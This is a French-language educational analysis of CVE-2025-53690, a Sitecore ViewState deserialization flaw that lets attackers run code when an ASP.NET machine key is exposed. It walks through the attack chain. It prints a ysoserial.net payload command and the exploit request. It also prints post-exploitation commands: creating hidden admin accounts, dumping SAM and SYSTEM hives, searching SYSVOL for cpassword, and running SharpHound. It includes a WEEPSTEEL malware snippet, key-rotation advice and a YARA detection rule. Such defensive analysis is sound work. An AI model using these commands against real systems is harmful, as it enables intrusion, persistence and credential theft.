
Ce sont les documents d'analyse de CVE-2025-53690.
CVE-2025-53690 est une vulnérabilité de désérialisation ViewState découverte dans la gamme de produits Sitecore. Elle exploite une clé machine ASP.NET exposée pour permettre une exécution de code à distance, constituant une faille de sécurité critique.
Le cœur de cette vulnérabilité réside dans une mauvaise gestion de configuration :
ViewState est une fonctionnalité de gestion d’état d’ASP.NET qui :
__VIEWSTATE<!-- Exemple de web.config -->
<system.web>
<machineKey
validationKey="[clé de 64 octets]"
decryptionKey="[clé de 48 octets]"
validation="HMACSHA256"
decryption="AES" />
</system.web>
Target: /sitecore/blocked.aspx
Method: POST
Caractéristiques : accessible sans authentification, utilise ViewState
L’attaquant utilise la clé machine connue et ysoserial.net pour générer une charge utile malveillante :
# Exemple d’utilisation de ysoserial.net
ysoserial.exe -f ViewState -g TypeConfuseDelegate -c "calc.exe" --validationkey="[clé]" --validationalg="HMACSHA256" --decryptionkey="[clé]" --decryptionalg="AES"
POST /sitecore/blocked.aspx HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
__VIEWSTATE=[charge_utile_malveillante]&__VIEWSTATEGENERATOR=[valeur]
/sitecore/blocked.aspx# Commandes exécutées
whoami
hostname
net user
tasklist
ipconfig /all
netstat -ano
net group "domain admins"
Outils déployés :
7za.exe : outil de compression de fichierslfe.ico : outil de tunneling réseau EARTHWORM1.vbs : VBScript pour l’exécution de commandes# Création d’un compte administrateur local
net user asp$ [mot_de_passe] /add
net localgroup administrators asp$ /add
net user sawadmin [mot_de_passe] /add
net localgroup administrators sawadmin /add
Collecte d’identifiants :
reg save HKLM\SYSTEM c:\users\public\system.hive
reg save HKLM\SAM c:\users\public\sam.hive
net user [AdminUser] /passwordchg:no /expires:never
wmic useraccount where name='[AdminUser]' set PasswordExpires=False
# Identification du contrôleur de domaine
nltest /DCLIST:[domaine]
nslookup [contrôleur-de-domaine]
# Recherche de cpassword dans les GPO (attaque des préférences de stratégie de groupe)
findstr /S /l cpassword \\[DC]\sysvol\[domaine]\policies\*.xml
# Exécution de BloodHound/SharpHound
sh.exe -c all
// Informations collectées
Information.BasicsInfo basicsInfo = new Information.BasicsInfo
{
Directories = new Information.Directories
{
CurrentWebDirectory = HostingEnvironment.MapPath("~/")
},
OperatingSystemInformation = Information.GetOperatingSystemInformation(),
DiskInformation = Information.GetDiskInformation(),
NetworkAdapterInformation = Information.GetNetworkAdapterInformation(),
Process = Information.GetProcessInformation()
};
Mode de sortie : dissimulation des données en se faisant passer pour un ViewState
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
value="/wEPDwUKLTcyODc4{sortie chiffrée AES + encodée en base64}" />
<!-- Générer une clé machine unique -->
<machineKey
validationKey="[nouvelle_clé_64_octets]"
decryptionKey="[nouvelle_clé_48_octets]"
validation="HMACSHA256"
decryption="AES" />
# Exemple de règle YARA (détection de WEEPSTEEL)
rule WEEPSTEEL_Detection {
strings:
$viewstate = "__VIEWSTATE"
$crypto = "System.Security.Cryptography"
$serializer = "JavaScriptSerializer"
condition:
all of them
}
CVE-2025-53690 est un exemple frappant de la façon dont une simple erreur de configuration peut conduire à une menace de sécurité critique. À travers cette vulnérabilité, les apprenants peuvent observer le cycle de vie complet d’une attaque APT réelle et comprendre les techniques d’attaque modernes ainsi que les stratégies de défense.